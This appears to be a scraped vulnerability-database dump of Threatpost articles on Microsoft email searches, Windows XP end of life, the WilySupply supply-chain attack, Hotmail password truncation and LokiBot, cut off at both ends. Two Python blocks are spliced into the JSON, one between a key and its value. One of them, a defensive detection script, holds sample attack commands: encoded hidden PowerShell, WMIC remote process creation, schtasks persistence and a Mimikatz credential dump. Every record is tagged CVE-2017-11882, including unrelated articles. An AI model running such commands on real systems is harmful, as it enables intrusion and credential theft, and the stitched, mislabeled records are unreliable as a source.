screenshots of unreleased Windows operating system features. 
Microsoft\u2019s Trustworthy Computing Investigations (TWCI), the division of the company tasked with protecting it against both external and internal threats, launched an investigation accordingly.\n\nIn early September 2012, an unnamed person contacted former president of the Windows Division of Microsoft, Steven Sinofsky. This source had been contacted by the blogger in order to confirm that the code he had received was in fact proprietary Microsoft code. In an interview with the TWCI, the source indicated that the blogger had contacted the source via Hotmail.\n\nAccording to the complaint (which was acquired by the [Register](<http://regmedia.co.uk/2014/03/20/kibkalo-complaint.pdf>)), \u201cAfter confirmation that the data was Microsoft\u2019s proprietary trade secret, on September 7, 2012 Microsoft\u2019s Office of Legal Compliance (OLC) approved content pulls of the blogger\u2019s Hotmail account.\u201d\n\nUpon examining the contents of the blogger\u2019s email account, Microsoft found Kibkalo\u2019s correspondence with the blogger. The company then provided all of this information to the FBI, who then arrested Kibkalo and charged him with the theft of trade secrets.\n\nMicrosoft published a response to the emergence of these facts, noting that it would make certain changes to its policies, but ultimately defending its right to search the contents of its users\u2019 communication without legal oversight.\n\n\u201cCourts do not, however, issue orders authorizing someone to search themselves, since obviously no such order is needed,\u201d wrote John Frank, deputy general counsel and vice president of legal and corporate affairs. 
\u201cSo even when we believe we have probable cause, there\u2019s not an applicable court process for an investigation such as this one relating to the information stored on servers located on our own premises.\u201d\n\nFrank goes on to claim that the company acted within its terms of service by conducting \u201ca limited review of this third party\u2019s Microsoft operated accounts,\u201d which the company only undertakes in \u201cthe most exceptional circumstances\u201d after \u201c[applying] a rigorous process before reviewing such content.\u201d\n\nFrank also notes the company\u2019s understanding of public concern regarding their actions, and thus, the company says it will adhere to the following policies moving forward:\n\n * Microsoft will not conduct a search of customer email and other services unless the circumstances would justify a court order, if one were available.\n * To ensure compliance with the standards applicable to obtaining a court order, Microsoft will rely in the first instance on a legal team separate from the internal investigating team to assess the evidence. It will move forward only if that team concludes there is evidence of a crime that would be sufficient to justify a court order, if one were applicable. As a new and additional step, the company will then submit this evidence to an outside attorney who is a former federal judge. It will conduct such a search only if this former judge similarly concludes that there is evidence sufficient for a court order.\n * Even when such a search takes place, it is important that it be confined to the matter under investigation and not search for other information. Microsoft says it will continue to ensure that the search itself is conducted in a proper manner, with supervision by counsel for this purpose.\n * Finally, the company believes it is appropriate to ensure transparency of these types of searches, just as it is for searches that are conducted in response to governmental or court orders. 
The company therefore will publish as part of its bi-annual [transparency report](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653>) the data on the number of these searches that have been conducted and the number of customer accounts that have been affected.\n\n\u201cUnfortunately, this new policy just doubles down on the Microsoft\u2019s indefensible and tone-deaf actions in the Kibkalo case,\u201d says EFF legal fellow, Andrew Crocker. \u201cIt begins with a false premise that courts do not issue orders in these circumstances because Microsoft was searching \u2018itself,\u2019 rather than the contents of its user\u2019s email on servers it controlled.\u201d\n\nHad the company believed it had probable cause to search one of its users\u2019 Hotmail accounts, Crocker continues, Microsoft could have easily presented its case to the FBI and acquired a proper search warrant.\n\n\u201cTo be sure, the process described in Microsoft\u2019s statement bears more than a passing resemblance to a standard criminal investigation, with a prosecutorial team building a case and then presenting it to an ostensibly neutral third party, a retired federal judge no less,\u201d Crocker writes. 
\u201cLet\u2019s call it Warrants for Windows!\u201d\n\nCrocker admits that while this search may have revealed criminal activity, it was also conducted in Microsoft\u2019s own self-interest, and, therefore, sets an extremely dangerous precedent.\n", "cvss3": {}, "published": "2014-03-24T12:55:29", "type": "threatpost", "title": "Microsoft Reads User Email without Warrant", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-24T16:55:29", "id": "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "href": "https://threatpost.com/critics-upset-as-microsoft-conducts-email-search-in-leak-investigation/104969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:05", "description": "For those of you anticipating the start of a Walking Dead-style malware apocalypse next Tuesday, calm yourselves.\n\nThe official end of security support for Windows XP is upon us, but it\u2019s important to check some anxiety at the door and keep some perspective.\n\n\u201cI\u2019ve been a forensics investigator for 14 years and in my experience, I don\u2019t know I\u2019ve come across one incident, or very few anyway, where a vulnerability was exploited where an unpatched system wasn\u2019t the source of a breach,\u201d said Christopher Pogue, director at Trustwave. Pogue said breaches are much more likely to be blamed on poor passwords, weak access control systems or a poorly configured firewall than a glaring hole in the underlying operating system.\n\n\u201cAll the administration stuff in place around these systems falls down. Attackers leverage that because they want the path of least resistance,\u201d Pogue said. \u201cYou have to presume that before they get their exploit on an unpatched XP machine, they have to breach the environment, bypass firewalls, get to the system, pivot to the unpatched system and hope it has critical data on it so they can run exploit code. 
There are a whole lot of items that have to line up for that to happen.\u201d\n\nThe hype and hyperbole around April 8, the latest in a long line of security Doomsdays, is rooted in theories that because a good number of XP systems remain in use storing data and processing transactions, that any previously unreported XP vulnerabilities will be perpetual zero-days. The theory continues that attackers have been building and hording XP exploits, anxiously wringing their hands waiting for April 8, 2014 to come and go.\n\nNow to dismiss all of that as FUD is foolhardy; some attackers who do have [XP exploits that will be zero days](<http://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241>) in a matter of five days are going to wait. Others are less patient (see the recent [XP Rich Text Format zero day](<http://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980>) that will be patched on Tuesday). And for those smaller organizations with fewer IT resources that may still be running XP machines that still hum along carrying out their mission day after day, their risk posture will be slouching a little more come Tuesday.\n\nBig picture, however, people are moving off of XP. Qualys CTO Wolfgang Kandek published some numbers based off the company\u2019s flagship vulnerability scanning service that indicate the XP installed base had dipped to below 15 percent, down from 35 percent 14 months ago. Migrations in the transportation and health care industries are much more dramatic, he said.\n\n\u201cThese are two extremes, but all industries are showing a downward slope (migrating off XP); none are stagnant,\u201d Kandek said.\n\nKandek is in the camp that attackers will intensify their targeting of XP machines and in particular will look at patches for modern Windows 7 and 8 systems and determine whether those vulnerabilities could be present in no-longer supported XP machines. 
He also urges organizations that must use XP to isolate those machines off the network, keep them for a specialized purpose and keep them offline.\n\n\u201cIn May, Microsoft will publish bulletins and patches, and those can be taken by a hacker and reverse-engineered. They will ask \u2018What does it fix?\u2019 And once they know what it does on Windows 7 or 8, that it changes a DLL or fixes an overflow, they could go into XP and figure out whether the same DLL exists or overflow vulnerability exists,\u201d Kandek said. \u201cPatches map to vulnerabilities that could be in XP. Sometimes they\u2019re only in a new component of Windows 7, but most of the time you can find those vulnerabilities in XP.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as a pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n\nA key difference to point out, however, is that Windows 7 and 8, for example, are radically different under the hood than XP. Microsoft has invested time and money into building mitigations for a number of dangerous memory-based attacks. Technologies such as ASLR and DEP make it much more challenging and costly for an attacker to execute malicious code against vulnerabilities in the operating system. Looking for bugs in XP that live in Windows 7 or 8 just may not be the best use of resources for an attacker.\n\n\u201cAn attacker has always chosen the path of least resistance to gain access to a system; they don\u2019t have to exploit the operating system, and for the most part, haven\u2019t,\u201d Trustwave\u2019s Pogue said. 
\u201cWhile it\u2019s still possible, if I were a small business owner and running XP to store and process data, I\u2019d be concerned about it and take steps to run an updated and patched operating system. Even so, it\u2019s important to remember that\u2019s not a silver bullet. Updating to Windows 7 doesn\u2019t mean you\u2019re necessarily safe. You have to build up defense-in-depth mechanisms. XP has been updated and patched up to now, and I\u2019ve investigated thousands of breaches on XP systems. An updated OS does not always equal security.\u201d\n", "cvss3": {}, "published": "2014-04-04T12:13:55", "type": "threatpost", "title": "Windows XP End of Life Breeding FUD, Legit Concerns", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-07T17:28:37", "id": "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "href": "https://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:18", "description": "In the year and a half since we first launched Threatpost, the site has grown very quickly, probably more quickly than any of us had even hoped it might. We\u2019ve added a couple of regular podcasts, original videos, developed a stable of terrific regular contributors and recently launched our first on-demand video event. And now we\u2019re making a major addition to our editorial staff.\n\nI\u2019m very excited and proud to announce that Paul Roberts is bringing his talents to Threatpost. Paul is a well-known personality in the security community, having started out covering security for the IDG News Service before moving to eWeek magazine, where he and I worked together for several years. 
Paul then moved on to InfoWorld before spending the last few years as an analyst at The 451 Group.\n\nPaul has a wealth of experience in the security industry and brings a strong background in both journalism and analysis to the Threatpost staff. He\u2019ll be writing news and analysis pieces, bringing his sharp analytical eye and deep knowledge of the industry to bear. Look for in-depth features and news coverage from Paul as he gets his feet under him. Paul\u2019s a terrific addition to our staff, which will still include Ryan Naraine and me and our regular set of contributors, so we\u2019re very excited for this next evolution of Threatpost.\n\nHang on, because it\u2019ll be a fun ride.\n", "cvss3": {}, "published": "2010-08-02T04:44:19", "type": "threatpost", "title": "Paul Roberts Joins Threatpost", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:18:35", "id": "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "href": "https://threatpost.com/paul-roberts-joins-threatpost-080210/74279/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:44", "description": "Microsoft said a recent attack it calls [Operation WilySupply](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) utilized the update mechanism of an unnamed software editing tool to infect targets in the finance and payment industries with in-memory malware.\n\nThe unnamed editing tool was used to send unsigned malicious updates to users in targeted attacks, according to a report published Thursday.\n\n\u201cWhile their software supply chain served as a channel for attacking other organizations, they themselves were also under attack,\u201d said Elia Florio, senior security software engineer, with Windows Defender ATP Research Team.\n\nIt\u2019s unclear just how many affected parties there were 
and when the attacks took place. However, Florio said the attacks were selective and purposely went after only the \u201cmost valuable targets\u201d in an effort to avoid detection.\n\n\u201cWe believe that the activity group behind Operation WilySupply is motivated by financial gain. They compromise third-party software packages delivered through updaters and other channels to reach victims who are mostly in the finance and payment industries,\u201d Florio wrote.\n\nHe said Microsoft began investigating the suspicious activity after computers using the updater were red-flagged by Windows Defender ATP. \u201cWindows Defender ATP initially called our attention to alerts flagging suspicious PowerShell scripts, self-deletion of executables, and other suspect activities,\u201d Florio wrote.\n\nA forensic analysis of the _Temp_ folder on one of the targeted systems revealed the legitimate third-party updater running as a service. However, closer inspection revealed the updater had also downloaded an unsigned, low-prevalence executable just before the malicious activity was observed, according to Florio.\n\n\u201cThe downloaded executable turned out to be a malicious binary (Rivit) that launched PowerShell scripts bundled with the Meterpreter reverse shell, which granted the remote attacker silent control,\u201d Florio wrote. \u201cThe malware binary, named by the cybercriminals _ue.exe_, was a small piece of code with the sole purpose of launching a Meterpreter shell.\u201d\n\nMeterpreter is a legitimate pen-testing tool packaged with the Metasploit framework and can be used to carry out in-memory or fileless attacks. Meterpreter attaches itself to a process and is capable of carrying out in-memory DLL injections. It\u2019s one of several open-source tools such as Lazagne that allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary\u2019s control server. 
In-memory or fileless attacks, Florio said, are a [fast growing trend among cybercriminals](<https://threatpost.com/hard-target-fileless-malware/125054/>).\n\nAttackers, Florio said, were taking advantage of the trusted relationship within the context of the software supply chain. The victims were unaware that a malicious third party had infiltrated the remote update channel of the supply chain.\n\nSelf-updating software has been targeted in the past on a number of occasions, points out Microsoft. Unrelated incidents include adversaries targeting Altair Technologies\u2019 EvLog update process, the auto-update mechanism for South Korean software SimDisk and the update server used by ESTsoft\u2019s ALZip compression application, according to researchers.\n\nNoteworthy to the attack was the fact adversaries conducted advanced recon that included qualifying systems with tools such as .NET, IPCONFIG, NETSTAT, NLTEST, and WHOAMI, Florio said.\n\nAdditional techniques, tactics and procedures Florio noted included: memory-only payloads assisted by PowerShell and Meterpreter running in rundll32; migration into long-living processes, such as the Windows Print Spooler (_spoolsv.exe_); use of common tools like Mimikatz and Kerberoast to dump hashes; lateral movement using Windows Management Instrumentation (WMI), specifically the _WMIC /node_ command; and persistence through scheduled tasks created using SCHTASKS and AT commands.\n\nTips on protection from such attacks include hardening defenses with strong encryption used in update channels, putting script and configuration files in signed containers and adopting Security Development Lifecycle best practices, according to Florio.\n", "cvss3": {}, "published": "2017-05-05T14:11:31", "type": "threatpost", "title": "Supply Chain Update Software Unknowingly Used in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-05-05T18:11:31", "id": 
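Every step in the WilySupply chain above leaves a process-creation record: the trusted updater service launching an unsigned binary out of Temp, PowerShell staged from rundll32, WMIC /node for lateral movement, SCHTASKS or AT for persistence, and Mimikatz-style command lines. The triage script below is an added example written for this page, not Microsoft's or Threatpost's code. It runs one rule per TTP over constructed process-creation events shaped like Sysmon event ID 1 records; the updater image path (`updater.exe`), the `signed` field (standing in for an Authenticode verdict the collector attaches) and all sample events are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

# Hypothetical path of the compromised third-party updater (the article
# does not name the product); adjust to the real service image.
UPDATER_IMAGE = r"c:\program files\editortool\updater.exe"


@dataclass
class ProcEvent:
    """Process-creation record, the fields Sysmon event ID 1 carries.
    `signed` stands in for an Authenticode verdict the collector attaches."""
    pid: int
    parent_image: str
    image: str
    command_line: str
    signed: bool = True


def _basename_is(path: str, name: str) -> bool:
    return path.lower().rsplit("\\", 1)[-1] == name


def updater_dropped_unsigned_temp_binary(e: ProcEvent) -> bool:
    # The trusted updater service launching an unsigned binary out of Temp.
    return (e.parent_image.lower() == UPDATER_IMAGE
            and not e.signed
            and "\\temp\\" in e.image.lower())


def powershell_under_rundll32(e: ProcEvent) -> bool:
    # Memory-only PowerShell staged from rundll32.
    return _basename_is(e.parent_image, "rundll32.exe") and _basename_is(e.image, "powershell.exe")


def wmic_remote_node(e: ProcEvent) -> bool:
    # Lateral movement with WMIC /node:<host>.
    return _basename_is(e.image, "wmic.exe") and re.search(r"/node:", e.command_line, re.I) is not None


def scheduled_task_persistence(e: ProcEvent) -> bool:
    # SCHTASKS /create, or any use of the legacy AT scheduler.
    if _basename_is(e.image, "schtasks.exe"):
        return re.search(r"(^|\s)/create(\s|$)", e.command_line, re.I) is not None
    return _basename_is(e.image, "at.exe")


def credential_dumping_cmdline(e: ProcEvent) -> bool:
    # Mimikatz module syntax or a Kerberoast helper on the command line.
    return re.search(r"sekurlsa::|lsadump::|kerberoast", e.command_line, re.I) is not None


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("updater_dropped_unsigned_temp_binary", updater_dropped_unsigned_temp_binary),
    ("powershell_under_rundll32", powershell_under_rundll32),
    ("wmic_remote_node", wmic_remote_node),
    ("scheduled_task_persistence", scheduled_task_persistence),
    ("credential_dumping_cmdline", credential_dumping_cmdline),
]


def triage(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every rule each event trips, in event order."""
    return [(name, e.pid) for e in events for name, rule in RULES if rule(e)]


# Constructed sample telemetry following the sequence the article describes.
SAMPLE_EVENTS = [
    ProcEvent(4100, UPDATER_IMAGE, r"c:\users\alice\appdata\local\temp\ue.exe", "ue.exe", signed=False),
    ProcEvent(4120, r"c:\windows\system32\rundll32.exe",
              r"c:\windows\system32\windowspowershell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -Enc AAAA"),
    ProcEvent(4130, r"c:\windows\system32\spoolsv.exe", r"c:\windows\system32\wbem\wmic.exe",
              'wmic /node:FILESRV01 process call create "cmd.exe /c whoami"'),
    ProcEvent(4140, r"c:\windows\system32\cmd.exe", r"c:\windows\system32\schtasks.exe",
              r"schtasks /create /tn Updater /tr c:\users\alice\appdata\local\temp\ue.exe /sc onlogon"),
    ProcEvent(4150, r"c:\windows\system32\services.exe", UPDATER_IMAGE, "updater.exe /service"),
    ProcEvent(4160, r"c:\windows\explorer.exe", r"c:\windows\system32\schtasks.exe", "schtasks /query"),
    ProcEvent(4170, r"c:\windows\system32\windowspowershell\v1.0\powershell.exe",
              r"c:\users\alice\appdata\local\temp\m.exe", 'm.exe "sekurlsa::logonpasswords"', signed=False),
]

if __name__ == "__main__":
    for name, pid in triage(SAMPLE_EVENTS):
        print(f"{pid}: {name}")
```

The first rule is the one worth tuning per environment: a legitimate updater that never writes unsigned executables to Temp gives it a near-zero false-positive rate, and it fires at the moment the supply-chain trust is abused, before any of the later, noisier tradecraft.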
"THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "href": "https://threatpost.com/supply-chain-update-software-unknowingly-used-in-attacks/125483/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "[](<https://threatpost.com/hotmail-limits-passwords-16-characters-092112/>)Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. 
However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not initially respond to questions on this issue.\n\nIn order to keep passwords safe from snooping, many Web sites run users\u2019 plaintext passwords through a hash function, which obscures them. Depending upon which hash function is being used, and what kind of computer is used to do the cracking, the length of time needed to crack a password hash can vary greatly. \n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said. \n\n\u201cSixteen characters has been the limit for years now. We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft. 
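Raiu's second possibility, hashing only the first 16 characters, is easy to see in code. The verifier below is an added example written for this page, not Hotmail's code or anything Raiu published: it enrolls a constructed 30-character password twice, once through a verifier that truncates to 16 characters before hashing and once through one that hashes the full string, then checks which candidates each one accepts. PBKDF2-HMAC-SHA256, the work factor and the 16-character cutoff are illustrative choices.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

LIMIT = 16            # the cutoff the article describes
ITERATIONS = 50_000   # illustrative PBKDF2 work factor, not Microsoft's


def _pbkdf2(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def enroll(password: str, truncate: bool, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Produce the stored (salt, digest) pair.

    With truncate=True only the first LIMIT characters enter the hash, which
    is Raiu's second possibility: nothing past position 16 is ever compared
    again, so the extra characters add no security at all."""
    salt = salt if salt is not None else os.urandom(16)
    material = password[:LIMIT] if truncate else password
    return salt, _pbkdf2(material, salt)


def verify(record: Tuple[bytes, bytes], candidate: str, truncate: bool) -> bool:
    """Constant-time comparison against the stored digest."""
    salt, digest = record
    material = candidate[:LIMIT] if truncate else candidate
    return hmac.compare_digest(_pbkdf2(material, salt), digest)


def prefix_equivalence(password: str, truncate: bool) -> Dict[str, bool]:
    """Which candidates unlock an account enrolled with `password`?"""
    record = enroll(password, truncate)
    return {
        "full_password_accepted": verify(record, password, truncate),
        "prefix_accepted": verify(record, password[:LIMIT], truncate),
        "wrong_tail_accepted": verify(record, password[:LIMIT] + "zzzz", truncate),
    }


# Constructed 30-character password, the length Raiu says his own had.
SAMPLE_PASSWORD = "hotmail-password-is-long-2012!"

if __name__ == "__main__":
    print("truncating verifier:  ", prefix_equivalence(SAMPLE_PASSWORD, truncate=True))
    print("full-length verifier: ", prefix_equivalence(SAMPLE_PASSWORD, truncate=False))
```

The truncating verifier accepts the 16-character prefix and any garbage after it, which is exactly the behaviour Raiu observed; the full-length verifier rejects both. The point for a practitioner is that a silent truncation is invisible from the outside until someone tries a prefix, so a login test with a deliberately shortened password belongs in any review of a password store.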
_\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). 
\u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nTo boot, LokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Norse namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. \u201cSince LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and leveraging the exploit [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (an issue in Office Equation Editor that allows attackers to automatically run malicious code without requiring user interaction). 
The latter is done via malicious RTF files, researchers have observed.\n\nTo boot, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, "published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 
update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later, admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson.\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers. Some users said the update failed to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. 
demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>) _reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post _article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. 
\u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:03", "description": "[](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>)\n\nA security researcher from nCircle is accusing Microsoft of gamesmanship in its description of an unpatched IIS vulnerability in the way the WebDAV extension decodes a requested URL. The end result is that a successful exploit would allow a hacker to bypass authentication and gain unauthorized access to resources.\n\n\u201cMicrosoft has classified this issue two different ways in two different places,\u201d he said. \u201c[On the SRD blog ](<http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx>)(it) refers to this as a 